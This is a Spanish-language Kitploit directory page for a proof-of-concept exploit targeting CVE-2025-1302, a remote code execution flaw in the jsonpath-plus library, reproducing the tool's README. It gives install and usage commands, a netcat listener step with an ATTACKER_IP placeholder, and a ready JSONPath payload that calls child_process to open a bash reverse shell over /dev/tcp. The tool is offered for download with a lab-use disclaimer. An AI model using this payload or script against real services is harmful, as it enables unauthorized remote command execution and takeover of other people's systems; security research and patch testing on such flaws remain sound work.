Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — Exploit PoC y demo de servidor vulnerable para CVE-2025-1302 en jsonpath-plus. | Kitploit
Herramientas/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHub
abrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

Exploit PoC y demo de servidor vulnerable para CVE-2025-1302 en jsonpath-plus.

Ver Repositorio
19hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1302 JSONPath-Plus PoC de RCE

Nombre del script PoC: poc.py

Un script de explotación de prueba de concepto para CVE-2025-1302, que apunta a una vulnerabilidad de RCE en la librería jsonpath-plus. Cuando se ejecuta contra un endpoint de servicio vulnerable, el script intenta desencadenar la ejecución remota de código mediante un payload de JSONPath y establecer una reverse shell de vuelta al atacante.


Características

  • Métodos HTTP flexibles: Soporta POST, GET o AUTO (POST con fallback a GET) mediante las opciones --method o --no-fallback.
  • Payloads personalizados: Carga una o más plantillas de payload RCE JSONPath desde un archivo, con plantillas {ip} y {port}.
  • Payload predeterminado integrado: Si no se proporciona un archivo de payloads, utiliza una plantilla completa de reverse shell en bash.
  • Depuración verbosa: Imprime los cuerpos completos de solicitudes/respuestas tanto para los intentos POST como GET cuando fallan.
  • Indicadores de progreso: Muestra barras de progreso tqdm para los bucles de delay y payload.
  • Registro: Opcionalmente guarda todos los resultados en un archivo JSON con --output.

Instalación

  1. Clona este repositorio:

    git clone https://github.com/yourorg/jsonpath-rce-poc.git
    cd jsonpath-rce-poc
    
  2. Instala las dependencias (requiere Python 3.6+):

    pip install -r requirements.txt
    

Uso

  1. Inicia un listener en tu máquina atacante (reemplaza el puerto según sea necesario):

    nc -lvnp 9999
    
  2. Ejecuta el PoC:

    python3 poc.py \
      --url http://TARGET_HOST:PORT/query \
      --ip ATTACKER_IP --port 9999 \
      [--payload-file payloads.txt] \
      [--delay 5] \
      [--method AUTO|POST|GET] \
      [--no-fallback] \
      [--output results.json]
    
  • --payload-file: Archivo que contiene un payload JSONPath por línea. Usa los marcadores de posición {ip} y {port}.
  • --delay: Segundos de espera antes de enviar los payloads (muestra una cuenta atrás).
  • --method: Fuerza POST, GET o AUTO (predeterminado).
  • --no-fallback: Atajo para omitir cualquier reintento GET (equivalente a --method POST).
  • --output: Ruta para guardar el registro JSON de los intentos.

Ejemplo de Archivo de Payload

$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]

Contribución

  1. Haz un fork del repositorio y crea una rama de características.
  2. Envía un pull request con tus cambios.

Descargo de responsabilidad

Usa este script solo en entornos de laboratorio controlados y contra sistemas que te pertenezcan o para los que tengas permiso explícito de prueba. El uso indebido puede ser ilegal y poco ético.

Descargar herramienta